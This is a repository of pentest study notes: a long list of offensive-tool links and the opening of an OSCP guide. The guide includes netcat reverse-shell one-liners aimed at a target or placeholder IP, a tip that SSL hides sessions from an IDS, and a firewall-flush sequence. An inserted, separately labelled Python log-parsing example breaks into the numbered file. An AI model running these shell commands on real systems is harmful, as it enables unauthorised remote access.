├── InfoSec-Learning-Materials
│   ├── Bug B0unty.md
│   ├── Multiple Pentest Tools.md
│   ├── OSCP-Survival-Guide.md
│   ├── Process.md
│   ├── README.md
│   ├── Useful Pentest Commands.md
│   ├── Useful Snippets.md
│   └── todo.md
└── README.md
/InfoSec-Learning-Materials/Bug B0unty.md:
--------------------------------------------------------------------------------
1 | # Web Bug Bounty Resources / Writeups
2 |
3 | ## Recon
4 | ### Writeups
5 |
6 |
7 | ### Tools
8 |
9 | ### General
10 | [What tools I use for my recon during #BugBounty](https://medium.com/bugbountywriteup/whats-tools-i-use-for-my-recon-during-bugbounty-ec25f7f12e6d)
11 |
12 |
13 | ## Vulnerability Discovery / Fuzzing
14 | ### Writeups
15 |
16 | ### Tools
17 |
18 | ## Exploiting
19 | ### Writeups
20 |
21 | ### Tools
22 |
23 |
24 | ## General Methodology
25 | ### Writeups
26 |
27 | ### Tools
28 |
29 | ## Reporting
30 |
31 | ## Full Writeups
32 | [Paypal: Expression Language Injection](https://medium.com/@adrien_jeanneau/how-i-was-able-to-list-some-internal-information-from-paypal-bugbounty-ca8d217a397c)
33 |
34 | ## Misc.
35 |
--------------------------------------------------------------------------------
/InfoSec-Learning-Materials/Multiple Pentest Tools.md:
--------------------------------------------------------------------------------
1 | # Multiple Pentest Tools
2 |
3 |
4 |
5 | ## General:
6 |
7 | [Cheatsheets - Penetration Testing/Security Cheatsheets](https://github.com/jshaw87/Cheatsheets)
8 |
9 | [awesome-pentest - penetration testing resources](https://github.com/Hack-with-Github/Awesome-Hacking)
10 |
11 | [Red-Team-Infrastructure-Wiki - Red Team infrastructure hardening resources](https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki)
12 |
13 | [Infosec_Reference - Information Security Reference](https://github.com/rmusser01/Infosec_Reference)
14 |
15 |
16 |
17 | ## Web Services:
18 |
19 | [JettyBleed - Jetty HttpParser Error Remote Memory Disclosure](https://github.com/AppSecConsulting/Pentest-Tools)
20 |
21 | [clusterd - Jboss/Coldfusion/WebLogic/Railo/Tomcat/Axis2/Glassfish](https://github.com/hatRiot/clusterd)
22 |
23 | [xsser - From XSS to RCE wordpress/joomla](https://github.com/Varbaek/xsser)
24 |
25 | [Java-Deserialization-Exploit - weaponizes ysoserial code to gain a remote shell](https://github.com/njfox/Java-Deserialization-Exploit)
26 |
27 | [CMSmap - CMS scanner](https://github.com/Dionach/CMSmap)
28 |
29 | [wordpress-exploit-framework - penetration testing of WordPress](https://github.com/rastating/wordpress-exploit-framework)
30 |
31 | [joomlol - Joomla User-Agent/X-Forwarded-For RCE ](https://github.com/compoterhacker/joomlol)
32 |
33 | [joomlavs - Joomla vulnerability scanner](https://github.com/rastating/joomlavs)
34 |
35 | [mongoaudit - MongoDB auditing and pentesting tool](https://github.com/stampery/mongoaudit)
36 |
37 | [davscan - Fingerprints servers, finds exploits, scans WebDAV](https://github.com/Graph-X/davscan)
38 |
39 |
40 |
41 | ## Web Applications:
42 |
43 | [HandyHeaderHacker - Examine HTTP response headers for common security issues](https://github.com/vpnguy/HandyHeaderHacker)
44 |
45 | [OpenDoor - OWASP Directory Access scanner](https://github.com/stanislav-web/OpenDoor)
46 |
47 | [ASH-Keylogger - simple keylogger application for XSS attack](https://github.com/AnonymousSecurityHackers/ASH-Keylogger)
48 |
49 | [tbhm - The Bug Hunters Methodology ](https://github.com/jhaddix/tbhm)
50 |
51 | [commix - command injection](https://github.com/commixproject/commix)
52 |
53 | [NoSQLMap - Mongo database and NoSQL](https://github.com/tcstool/NoSQLMap)
54 |
55 | [xsshunter - Second order XSS](https://github.com/mandatoryprogrammer/xsshunter)
56 |
57 |
58 |
59 | ## Burp Extensions:
60 |
61 | [backslash-powered-scanner - unknown classes of injection vulnerabilities](https://github.com/PortSwigger/backslash-powered-scanner)
62 |
63 | [BurpSmartBuster - content discovery plugin](https://github.com/pathetiq/BurpSmartBuster)
64 |
65 | [ActiveScanPlusPlus - extends Burp Suite's active and passive scanning capabilities](https://github.com/albinowax/ActiveScanPlusPlus)
66 |
67 |
68 |
69 | ## Local privilege escalation:
70 |
71 | [yodo - become root via limited sudo permissions](https://github.com/b3rito/yodo)
72 |
73 | [Pa-th-zuzu - Checks for PATH substitution vulnerabilities](https://github.com/ShotokanZH/Pa-th-zuzu)
74 |
75 | [sudo-snooper - acts like the original sudo binary to fool users](https://github.com/xorond/sudo-snooper)
76 |
77 | [RottenPotato - local privilege escalation from service account ](https://github.com/foxglovesec/RottenPotato)
78 |
79 | [UACMe - Windows AutoElevate backdoor](https://github.com/hfiref0x/UACME)
80 |
81 | [Invoke-LoginPrompt - Invokes a Windows Security Login Prompt](https://github.com/enigma0x3/Invoke-LoginPrompt)
82 |
83 | [Exploits-Pack - Exploits for getting local root on Linux](https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack)
84 |
85 | [windows-privesc-check - Standalone Executable](https://github.com/pentestmonkey/windows-privesc-check)
86 |
87 | [unix-privesc-check - simple privilege escalation vectors](https://github.com/pentestmonkey/unix-privesc-check)
88 |
89 | [LinEnum - local Linux Enumeration & Privilege Escalation Checks](https://github.com/rebootuser/LinEnum)
90 |
91 | [cowcron - Cronbased Dirty Cow Exploit](https://github.com/securifera/cowcron)
92 |
93 | [WindowsExploits - Precompiled Windows exploits](https://github.com/abatchy17/WindowsExploits)
94 |
95 | [Privilege-Escalation - common local exploits and enumeration scripts ](https://github.com/AusJock/Privilege-Escalation)
96 |
97 | [Unix-Privilege-Escalation-Exploits-Pack](https://github.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack)
98 |
99 | [Sherlock - PowerShell script to quickly find missing software patches](https://github.com/rasta-mouse/Sherlock)
100 |
101 | [GTFOBins - list of Unix binaries that can be exploited to bypass system security restrictions](https://github.com/GTFOBins/GTFOBins.github.io)
102 |
103 |
104 |
105 | ## Phishing:
106 |
107 | [eyephish - find similar looking domain names](https://github.com/phar/eyephish)
108 |
109 | [luckystrike - A PowerShell based utility for the creation of malicious Office macro documents](https://github.com/Shellntel/luckystrike)
110 |
111 | [phishery - Basic Auth Credential Harvester with a Word Document Template URL Injector ](https://github.com/ryhanson/phishery)
112 |
113 | [WordSteal - steal NTLM hashes](https://github.com/0x090x0/WordSteal)
114 |
115 | [ReelPhish - Real-Time Two-Factor Phishing Tool](https://github.com/fireeye/ReelPhish)
116 |
117 |
118 |
119 | ## Open Source Intelligence:
120 |
121 | [truffleHog - Searches through git repositories for high entropy strings](https://github.com/dxa4481/truffleHog)
122 |
123 | [Altdns - Subdomain discovery](https://github.com/infosec-au/altdns)
124 |
125 | [github-dorks - reveal sensitive personal and/or organizational information](https://github.com/techgaun/github-dorks)
126 |
127 | [gitrob - find sensitive information](https://github.com/michenriksen/gitrob)
128 |
129 | [Bluto - DNS Recon , Email Enumeration](https://github.com/darryllane/Bluto)
130 |
131 | [SimplyEmail - Email recon](https://github.com/killswitch-GUI/SimplyEmail)
132 |
133 | [Sublist3r - Fast subdomains enumeration tool for penetration testers ](https://github.com/aboul3la/Sublist3r)
134 |
135 | [snitch - information gathering via dorks ](https://github.com/Smaash/snitch)
136 |
137 | [RTA - scan all company's online facing assets](https://github.com/flipkart-incubator/RTA)
138 |
139 | [InSpy - LinkedIn enumeration tool](https://github.com/gojhonny/InSpy)
140 |
141 | [LinkedInt - LinkedIn scraper for reconnaissance](https://github.com/mdsecactivebreach/LinkedInt)
142 |
143 |
144 |
145 | ## Post-exploitation:
146 |
147 | [MailSniper - searching through email in a Microsoft Exchange ](https://github.com/dafthack/MailSniper)
148 |
149 | [Windows-Exploit-Suggester - patch levels against vulnerability database](https://github.com/GDSSecurity/Windows-Exploit-Suggester)
150 |
151 | [dnscat2-powershell - A Powershell client for dnscat2, an encrypted DNS command and control tool](https://github.com/lukebaggett/dnscat2-powershell)
152 |
153 | [lazykatz - extract credentials from remote targets protected with AV](https://github.com/bhdresh/lazykatz)
154 |
155 | [nps - Not PowerShell](https://github.com/Ben0xA/nps)
156 |
157 | [Invoke-Vnc - Powershell VNC injector](https://github.com/artkond/Invoke-Vnc)
158 |
159 | [spraywmi - mass spraying Unicorn PowerShell injection](https://github.com/trustedsec/spraywmi)
160 |
161 | [redsnarf - for retrieving hashes and credentials from Windows workstations](https://github.com/nccgroup/redsnarf)
162 |
163 | [HostRecon - situational awareness](https://github.com/dafthack/HostRecon)
164 |
165 | [mimipenguin - login password from the current linux user ](https://github.com/huntergregal/mimipenguin)
166 |
167 | [rpivot - socks4 reverse proxy for penetration testing ](https://github.com/artkond/rpivot)
168 |
169 |
170 |
171 | ## Looting:
172 |
173 | [cookie_stealer - steal cookies from the Firefox cookies database](https://github.com/rash2kool/cookie_stealer)
174 |
175 | [Wifi-Dumper - dump the wifi profiles and cleartext passwords of the connected access points](https://github.com/Viralmaniar/Wifi-Dumper)
176 |
177 | [WebLogicPasswordDecryptor - decrypt WebLogic passwords](https://github.com/NetSPI/WebLogicPasswordDecryptor)
178 |
179 | [jenkins-decrypt - Credentials dumper for Jenkins](https://github.com/tweksteen/jenkins-decrypt)
180 |
181 | [mimikittenz - ReadProcessMemory() in order to extract plain-text passwords](https://github.com/putterpanda/mimikittenz)
182 |
183 | [LaZagne - Credentials recovery project](https://github.com/AlessandroZ/LaZagne)
184 |
185 | [SessionGopher - extract WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop](https://github.com/fireeye/SessionGopher)
186 |
187 | [BrowserGather - Fileless web browser information extraction](https://github.com/sekirkity/BrowserGather)
188 |
189 | [windows_sshagent_extract - extract private keys from Windows 10's built in ssh-agent service](https://github.com/ropnop/windows_sshagent_extract)
190 |
191 |
192 |
193 | ## Network Hunting:
194 |
195 | [Sticky-Keys-Slayer - Scans for accessibility tools backdoors via RDP](https://github.com/linuz/Sticky-Keys-Slayer)
196 |
197 | [DomainPasswordSpray - password spray attack against users of a domain](https://github.com/dafthack/DomainPasswordSpray)
198 |
199 | [BloodHound - reveal relationships within an Active Directory](https://github.com/adaptivethreat/BloodHound)
200 |
201 | [APT2 - An Automated Penetration Testing Toolkit](https://github.com/MooseDojo/apt2)
202 |
203 | [CredNinja - identify if credentials are valid](https://github.com/Raikia/CredNinja)
204 |
205 | [EyeWitness - take screenshots of websites](https://github.com/ChrisTruncer/EyeWitness)
206 |
207 | [gowitness - a golang, web screenshot utility](https://github.com/sensepost/gowitness)
208 |
209 | [PowerUpSQL - PowerShell Toolkit for Attacking SQL Server](https://github.com/NetSPI/PowerUpSQL)
210 |
211 | [sparta - scanning and enumeration](https://github.com/SECFORCE/sparta)
212 |
213 | [Sn1per - Automated Pentest Recon Scanner](https://github.com/1N3/Sn1per)
214 |
215 | [PCredz - This tool extracts creds from a pcap file or from a live interface](https://github.com/lgandx/PCredz)
216 |
217 | [ridrelay - Enumerate usernames on a domain where you have no creds](https://github.com/skorov/ridrelay)
218 |
219 |
220 |
221 | ## Wireless:
222 |
223 | [air-hammer - WPA Enterprise horizontal brute-force](https://github.com/Wh1t3Rh1n0/air-hammer)
224 |
225 | [mana - toolkit for wifi rogue AP attacks](https://github.com/sensepost/mana)
226 |
227 | [crEAP - Harvesting Users on Enterprise Wireless Networks](https://github.com/Shellntel/scripts)
228 |
229 | [wifiphisher - phishing attacks against Wi-Fi clients ](https://github.com/sophron/wifiphisher)
230 |
231 |
232 |
233 | ## Man in the Middle:
234 |
235 | [mitmproxy - An interactive TLS-capable intercepting HTTP proxy](https://github.com/mitmproxy/mitmproxy)
236 |
237 | [bettercap - bettercap](https://github.com/evilsocket/bettercap)
238 |
239 | [MITMf - Framework for Man-In-The-Middle attacks ](https://github.com/byt3bl33d3r/MITMf)
240 |
241 | [Gifts/Responder - Responder for old python](https://github.com/Gifts/Responder)
242 |
243 | [mitm6 - pwning IPv4 via IPv6 ](https://github.com/fox-it/mitm6)
244 |
245 | [shelljack - man-in-the-middle pseudoterminal injection](https://github.com/emptymonkey/shelljack)
246 |
247 |
248 |
249 | ## Physical:
250 |
251 | [Brutal - Payload for teensy](https://github.com/Screetsec/Brutal)
252 |
253 | [poisontap - Exploits locked/password protected computers over USB](https://github.com/samyk/poisontap)
254 |
255 | [OverThruster - HID attack payload generator for Arduinos](https://github.com/RedLectroid/OverThruster)
256 |
257 | [Paensy - An attacker-oriented library for the Teensy 3.1 microcontroller](https://github.com/Ozuru/Paensy)
258 |
259 | [Kautilya - Payloads for a Human Interface Device](https://github.com/samratashok/Kautilya)
260 |
261 |
262 |
263 | ## Payloads:
264 |
265 | [JavaReverseTCPShell - Spawns a reverse TCP shell in Java](https://github.com/quantumvm/JavaReverseTCPShell)
266 |
267 | [splunk_shells - Splunk with reverse and bind shells](https://github.com/TBGSecurity/splunk_shells)
268 |
269 | [pyshell - shellify Your HTTP Command Injection](https://github.com/praetorian-inc/pyshell)
270 |
271 | [RobotsDisallowed - harvest of the Disallowed directories](https://github.com/danielmiessler/RobotsDisallowed)
272 |
273 | [SecLists - collection of multiple types of lists](https://github.com/danielmiessler/SecLists)
274 |
275 | [Probable-Wordlists - Wordlists sorted by probability](https://github.com/berzerk0/Probable-Wordlists)
276 |
277 | [ARCANUS - payload generator/handler. ](https://github.com/EgeBalci/ARCANUS)
278 |
279 | [Winpayloads - Undetectable Windows Payload Generation ](https://github.com/nccgroup/Winpayloads)
280 |
281 | [weevely3 - Weaponized web shell ](https://github.com/epinna/weevely3)
282 |
283 | [fuzzdb - Dictionary of attack patterns](https://github.com/fuzzdb-project/fuzzdb)
284 |
285 | [payloads - web attack payloads](https://github.com/foospidy/payloads)
286 |
287 | [HERCULES - payload generator that can bypass antivirus](https://github.com/EgeBalci/HERCULES)
288 |
289 | [Insanity-Framework - Generate Payloads](https://github.com/4w4k3/Insanity-Framework)
290 |
291 | [Brosec - An interactive reference tool for payloads](https://github.com/gabemarshall/Brosec)
292 |
293 | [MacroShop - delivering payloads via Office Macros](https://github.com/khr0x40sh/MacroShop)
294 |
295 | [Demiguise - HTA encryption tool](https://github.com/nccgroup/demiguise)
296 |
297 | [ClickOnceGenerator - Quick Malicious ClickOnceGenerator](https://github.com/Mr-Un1k0d3r/ClickOnceGenerator)
298 |
299 | [PayloadsAllTheThings - A list of useful payloads](https://github.com/swisskyrepo/PayloadsAllTheThings)
300 |
301 |
302 |
303 |
304 |
305 | ## Apple:
306 |
307 | [MMeTokenDecrypt - Decrypts and extracts iCloud and MMe authorization tokens](https://github.com/manwhoami/MMeTokenDecrypt)
308 |
309 | [OSXChromeDecrypt - Decrypt Google Chrome and Chromium Passwords on Mac OS X](https://github.com/manwhoami/OSXChromeDecrypt)
310 |
311 | [EggShell - iOS and OS X Surveillance Tool](https://github.com/neoneggplant/EggShell)
312 |
313 | [bonjour-browser - command line tool to browse for Bonjour](https://github.com/watson/bonjour-browser)
314 |
315 | [logKext - open source keylogger for Mac OS X](https://github.com/SlEePlEs5/logKext)
316 |
317 | [OSXAuditor - OS X computer forensics tool](https://github.com/jipegit/OSXAuditor)
318 |
319 | [davegrohl - Password Cracker for OS X](https://github.com/octomagon/davegrohl)
320 |
321 | [chainbreaker - Mac OS X Keychain Forensic Tool](https://github.com/n0fate/chainbreaker)
322 |
323 | [FiveOnceInYourLife - Local osx dialog box phishing](https://github.com/fuzzynop/FiveOnceInYourLife)
324 |
325 | [ARD-Inspector - decrypt the Apple Remote Desktop database](https://github.com/ygini/ARD-Inspector)
326 |
327 | [keychaindump - reading OS X keychain passwords](https://github.com/juuso/keychaindump)
328 |
329 | [Bella - python, post-exploitation, data mining tool](https://github.com/manwhoami/Bella)
330 |
331 | [EvilOSX - pure python, post-exploitation, RAT](https://github.com/Marten4n6/EvilOSX)
332 |
333 |
334 |
335 | ## Captive Portals:
336 |
337 | [cpscam - Bypass captive portals by impersonating inactive users](https://github.com/codewatchorg/cpscam)
338 |
339 |
340 |
341 | ## Passwords:
342 |
343 | [pipal - password analyser](https://github.com/digininja/pipal)
344 |
345 | [wordsmith - assist with creating tailored wordlists](https://github.com/skahwah/wordsmith)
346 |
347 |
348 |
349 | ## Obfuscation:
350 |
351 | [ObfuscatedEmpire - fork of Empire with Invoke-Obfuscation integrated directly in](https://github.com/cobbr/ObfuscatedEmpire)
352 |
353 | [obfuscate_launcher - Simple script for obfuscating payload launchers](https://github.com/jamcut/obfuscate_launcher)
354 |
355 | [Invoke-CradleCrafter - Download Cradle Generator & Obfuscator](https://github.com/danielbohannon/Invoke-CradleCrafter)
356 |
357 | [Invoke-Obfuscation - PowerShell Obfuscator](https://github.com/danielbohannon/Invoke-Obfuscation)
358 |
359 | [nps_payload - payloads for basic intrusion detection avoidance](https://github.com/trustedsec/nps_payload)
360 |
361 |
--------------------------------------------------------------------------------
/InfoSec-Learning-Materials/OSCP-Survival-Guide.md:
--------------------------------------------------------------------------------
1 | # OSCP-Survival-Guide
2 |
3 | _____ _____ _____ ______ _____ _ _ _____ _ _
4 | | _ / ___/ __ \| ___ \ / ___| (_) | | | __ \ (_) | |
5 | | | | \ `--.| / \/| |_/ / \ `--. _ _ _ ____ _____ ____ _| | | | \/_ _ _ __| | ___
6 | | | | |`--. \ | | __/ `--. \ | | | '__\ \ / / \ \ / / _` | | | | __| | | | |/ _` |/ _ \
7 | \ \_/ /\__/ / \__/\| | /\__/ / |_| | | \ V /| |\ V / (_| | | | |_\ \ |_| | | (_| | __/
8 | \___/\____/ \____/\_| \____/ \__,_|_| \_/ |_| \_/ \__,_|_| \____/\__,_|_|\__,_|\___|
9 |
10 | Kali Linux Offensive Security Certified Professional Playbook
11 |
12 | **NOTE: This document refers to the target IP as the exported variable $ip.**
13 |
14 | **To set this value on the command line use the following syntax:**
15 |
16 | **export ip=192.168.1.100**
17 |
18 |
19 | ***UPDATE: October 2, 2017***
20 | Thanks for all the Stars! Wrote my OSCP exam last night, did not pass sadly ... but I recorded a stop motion video of my failed attempt. TRY HARDER!
21 |
22 | https://www.youtube.com/watch?v=HBMZWl9zcsc
23 |
24 | The good news is that I will be learning more and adding more content to this guide :D
25 |
26 |
27 | ## Table of Contents
28 | - [Kali Linux](#kali-linux)
29 | - [Information Gathering & Vulnerability Scanning](#information-gathering--vulnerability-scanning)
30 | * [Passive Information Gathering](#passive-information-gathering)
31 | * [Active Information Gathering](#active-information-gathering)
32 | * [Port Scanning](#port-scanning)
33 | * [Enumeration](#enumeration)
34 | * [HTTP Enumeration](#http-enumeration)
35 | - [Buffer Overflows and Exploits](#buffer-overflows-and-exploits)
36 | - [Shells](#shells)
37 | - [File Transfers](#file-transfers)
38 | - [Privilege Escalation](#privilege-escalation)
39 | * [Linux Privilege Escalation](#linux-privilege-escalation)
40 | * [Windows Privilege Escalation](#windows-privilege-escalation)
41 | - [Client, Web and Password Attacks](#client-web-and-password-attacks)
42 | * [Client Attacks](#client-attacks)
43 | * [Web Attacks](#web-attacks)
44 | * [File Inclusion Vulnerabilities LFI/RFI](#file-inclusion-vulnerabilities)
45 | * [Database Vulnerabilities](#database-vulnerabilities)
46 | * [Password Attacks](#password-attacks)
47 | * [Password Hash Attacks](#password-hash-attacks)
48 | - [Networking, Pivoting and Tunneling](#networking-pivoting-and-tunneling)
49 | - [The Metasploit Framework](#the-metasploit-framework)
50 | - [Bypassing Antivirus Software](#bypassing-antivirus-software)
51 |
52 | Kali Linux
53 | ========================================================================================================
54 |
55 | - Set the Target IP Address to the `$ip` system variable
56 | `export ip=192.168.1.100`
57 |
58 | - Find the location of a file
59 | `locate sbd.exe`
60 |
61 | - Search through directories in the `$PATH` environment variable
62 | `which sbd`
63 |
64 | - Find a file whose name contains a specific
65 | string:
66 | `find / -name sbd\*`
67 |
68 | - Show active internet connections
69 | `netstat -lntp`
70 |
71 | - Change Password
72 | `passwd`
73 |
74 | - Verify a service is running and listening
75 | `netstat -antp |grep apache`
76 |
77 | - Start a service
78 | `systemctl start ssh `
79 |
80 | `systemctl start apache2`
81 |
82 | - Have a service start at boot
83 | `systemctl enable ssh`
84 |
85 | - Stop a service
86 | `systemctl stop ssh`
87 |
88 | - Unzip a gz file
89 | `gunzip access.log.gz`
90 |
91 | - Unzip a tar.gz file
92 | `tar -xzvf file.tar.gz`
93 |
94 | - Search command history
95 | `history | grep phrase_to_search_for`
96 |
97 | - Download a webpage
98 | `wget http://www.cisco.com`
99 |
100 | - Open a webpage
101 | `curl http://www.cisco.com`
102 |
103 | - String manipulation
104 |
105 | - Count number of lines in file
106 | `wc index.html`
107 |
108 | - Get the start or end of a file
109 | `head index.html`
110 |
111 | `tail index.html`
112 |
113 | - Extract all the lines that contain a string
114 | `grep "href=" index.html`
115 |
116 | - Cut a string by a delimiter, filter results then sort
117 | `grep "href=" index.html | cut -d "/" -f 3 | grep "\\." | cut -d '"' -f 1 | sort -u`
118 |
119 | - Using Grep and regular expressions and output to a file
120 | `cat index.html | grep -o 'http://[^"]*' | cut -d "/" -f 3 | sort -u > list.txt`
121 |
122 | - Use a bash loop to find the IP address behind each host
123 | `for url in $(cat list.txt); do host $url; done`
124 |
125 | - Collect all the IP Addresses from a log file and sort by
126 | frequency
127 | `cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn`
128 |
129 | - Decoding using Kali
130 |
131 | - Decode Base64 Encoded Values
132 |
133 | `echo -n "QWxhZGRpbjpvcGVuIHNlc2FtZQ==" | base64 --decode`
134 |
135 | - Decode Hexadecimal Encoded Values (xxd ignores whitespace, so the bytes may be grouped freely)
136 | `echo -n "46 4c 34 36 5f 33 3a 32 39 64 72 79 66 36 37 75 68 65 68 74" | xxd -r -ps`
137 |
138 | - Netcat - Read and write TCP and UDP Packets
139 |
140 | - Download Netcat for Windows (handy for creating reverse shells and transferring files on Windows systems):
141 | [https://joncraton.org/blog/46/netcat-for-windows/](https://joncraton.org/blog/46/netcat-for-windows/)
142 |
143 | - Connect to a POP3 mail server
144 | `nc -nv $ip 110`
145 |
146 | - Listen on TCP/UDP port
147 | `nc -nlvp 4444`
148 |
149 | - Connect to a netcat port
150 | `nc -nv $ip 4444`
151 |
152 | - Send a file using netcat
153 | `nc -nv $ip 4444 < /usr/share/windows-binaries/wget.exe`
154 |
155 | - Receive a file using netcat
156 | `nc -nlvp 4444 > incoming.exe`
157 |
158 | - Some OSs (OpenBSD) will use nc.traditional rather than nc so watch out for that...
159 |
160 | whereis nc
161 | nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz
162 |
163 | /bin/nc.traditional -e /bin/bash 1.2.3.4 4444
164 |
165 |
166 | - Create a reverse shell with Ncat using cmd.exe on Windows
167 | `nc.exe -nlvp 4444 -e cmd.exe`
168 |
169 | or
170 |
171 | `nc.exe -nv -e cmd.exe`
172 |
173 | - Create a reverse shell with Ncat using bash on Linux
174 | `nc -nv $ip 4444 -e /bin/bash`
175 |
176 | - Netcat for Banner Grabbing:
177 |
178 | `echo "" | nc -nv -w1 `
179 |
180 | - Ncat - Netcat from the Nmap project; adds SSL, which keeps the session contents out of sight of an
181 | IDS
182 |
183 | - Reverse shell from windows using cmd.exe using ssl
184 | `ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl`
185 |
186 | - Listen on port 4444 using ssl
187 | `ncat -v $ip 4444 --ssl`
188 |
189 | - Wireshark
190 | - Show only SMTP (port 25) and ICMP traffic:
191 |
192 | `tcp.port eq 25 or icmp`
193 |
194 | - Show only traffic in the LAN (192.168.x.x), between workstations and servers -- no Internet:
195 |
196 | `ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16`
197 |
198 | - Filter by a protocol ( e.g. SIP ) and filter out unwanted IPs:
199 |
200 | `ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip`
201 |
202 | - Some filters are equivalent
203 |
204 | `ip.addr == xxx.xxx.xxx.xxx`
205 |
206 | Equals
207 |
208 | `ip.src == xxx.xxx.xxx.xxx or ip.dst == xxx.xxx.xxx.xxx `
209 |
210 | ` ip.addr != xxx.xxx.xxx.xxx`
211 |
212 | Equals
213 |
214 | `ip.src != xxx.xxx.xxx.xxx or ip.dst != xxx.xxx.xxx.xxx`
215 |
216 | - Tcpdump
217 |
218 | - Display a pcap file
219 | `tcpdump -r passwordz.pcap`
220 |
221 | - Display ips and filter and sort
222 | `tcpdump -n -r passwordz.pcap | awk -F" " '{print $3}' | sort -u | head`
223 |
224 | - Grab a packet capture on port 80
225 | `tcpdump tcp port 80 -w output.pcap -i eth0`
226 |
227 | - Check for ACK or PSH flag set in a TCP packet
228 | `tcpdump -A -n 'tcp[13] = 24' -r passwordz.pcap`
229 |
230 | - IPTables
231 |
232 | - Deny traffic to ports except for Local Loopback
233 |
234 | `iptables -A INPUT -p tcp --destination-port 13327 ! -d $ip -j DROP `
235 |
236 | `iptables -A INPUT -p tcp --destination-port 9991 ! -d $ip -j DROP`
237 |
238 | - Clear ALL IPTables firewall rules
239 |
240 | iptables -P INPUT ACCEPT
241 | iptables -P FORWARD ACCEPT
242 | iptables -P OUTPUT ACCEPT
243 | iptables -t nat -F
244 | iptables -t mangle -F
245 | iptables -F
246 | iptables -X
247 | iptables -t raw -F && iptables -t raw -X
248 |
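The two Kali Linux items above that go beyond plain command invocation are the log pipeline (`cut -d " " -f 1 | sort | uniq -c | sort -urn`) and the tcpdump flag test (`tcp[13] = 24`). The following Python is an added example, not part of the OSCP-Survival-Guide: it parses constructed Common Log Format lines properly instead of cutting on the first space (so malformed lines are skipped rather than counted, and the count can be restricted to one status code, e.g. 401 to see which client is failing logins), and it decodes the TCP flag byte to show what the value 24 means. The log lines and IPs are constructed sample data.

```python
"""Added example (not from the OSCP-Survival-Guide): Python equivalents of the
"collect all the IP addresses from a log file and sort by frequency" pipeline
and of the tcpdump expression 'tcp[13] = 24' from the Kali Linux section."""
import re
from collections import Counter

# Constructed sample in Common Log Format (CLF); not real traffic.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [02/Oct/2017:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.0.7 - - [02/Oct/2017:10:00:02 +0000] "GET /login HTTP/1.1" 200 1024
10.0.0.5 - - [02/Oct/2017:10:00:03 +0000] "POST /login HTTP/1.1" 401 128
10.0.0.9 - - [02/Oct/2017:10:00:04 +0000] "GET /admin HTTP/1.1" 403 64
10.0.0.5 - - [02/Oct/2017:10:00:05 +0000] "POST /login HTTP/1.1" 401 128
10.0.0.7 - - [02/Oct/2017:10:00:06 +0000] "GET /logo.png HTTP/1.1" 200 4096
this line is not in CLF and is skipped
"""

# CLF: host ident authuser [date] "request" status bytes
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)


def parse_clf(line):
    """Parse one CLF line into a dict; return None when the line does not match."""
    m = CLF_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def top_source_ips(log_text, status=None):
    """Requests per client IP, most frequent first (ties broken by IP).

    Same result as `cut -d " " -f 1 | sort | uniq -c | sort -urn` on well-formed
    input, but unparseable lines are skipped and the count can be limited to one
    HTTP status code, which the cut pipeline cannot do.
    """
    counts = Counter()
    for line in log_text.splitlines():
        rec = parse_clf(line)
        if rec is None:
            continue
        if status is not None and rec["status"] != status:
            continue
        counts[rec["ip"]] += 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


# Flag bits of TCP header byte 13, the byte tcpdump's tcp[13] refers to.
TCP_FLAG_BITS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08,
                 "ACK": 0x10, "URG": 0x20, "ECE": 0x40, "CWR": 0x80}


def tcp_flags(flag_byte):
    """Names of the flags set in tcp[13], lowest bit first."""
    return [name for name, bit in TCP_FLAG_BITS.items() if flag_byte & bit]


def matches_tcpdump_flags(flag_byte, *names):
    """True when tcp[13] equals exactly these flags, as 'tcp[13] = 24' tests:
    the named flags are set and no other flag is."""
    want = 0
    for n in names:
        want |= TCP_FLAG_BITS[n]
    return flag_byte == want


if __name__ == "__main__":
    for ip, n in top_source_ips(SAMPLE_ACCESS_LOG):
        print(f"{n:7d} {ip}")
    print("401 only:", top_source_ips(SAMPLE_ACCESS_LOG, status=401))
    print("tcp[13] = 24 ->", tcp_flags(24))
```

One caveat the decoder makes visible: `tcp[13] = 24` matches packets whose flag byte is exactly PSH+ACK (0x08 + 0x10), not packets with either flag set; the "either" test is `tcp[13] & 24 != 0`.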
249 | Information Gathering & Vulnerability Scanning
250 | ===================================================================================================================================
251 |
252 | - Passive Information Gathering
253 | ---------------------------------------------------------------------------------------------------------------------------
254 |
255 | - Google Hacking
256 |
257 | - Google search to find website sub domains
258 | `site:microsoft.com`
259 |
260 | - Google filetype, and intitle
261 | `intitle:"netbotz appliance" "OK" -filetype:pdf`
262 |
263 | - Google inurl
264 | `inurl:"level/15/sexec/-/show"`
265 |
266 | - Google Hacking Database:
267 | https://www.exploit-db.com/google-hacking-database/
268 |
269 | - SSL Certificate Testing
270 | [https://www.ssllabs.com/ssltest/analyze.html](https://www.ssllabs.com/ssltest/analyze.html)
271 |
272 | - Email Harvesting
273 |
274 | - Simply Email
275 | `git clone https://github.com/killswitch-GUI/SimplyEmail.git `
276 |
277 | `./SimplyEmail.py -all -e TARGET-DOMAIN`
278 |
279 | - Netcraft
280 |
281 | - Determine the operating system and tools used to build a site
282 | https://searchdns.netcraft.com/
283 |
284 | - Whois Enumeration
285 | `whois domain-name-here.com `
286 |
287 | `whois $ip`
288 |
289 | - Banner Grabbing
290 |
291 | - `nc -v $ip 25`
292 |
293 | - `telnet $ip 25`
294 |
295 | - `nc TARGET-IP 80`
296 |
297 | - Recon-ng - full-featured web reconnaissance framework written in Python
298 |
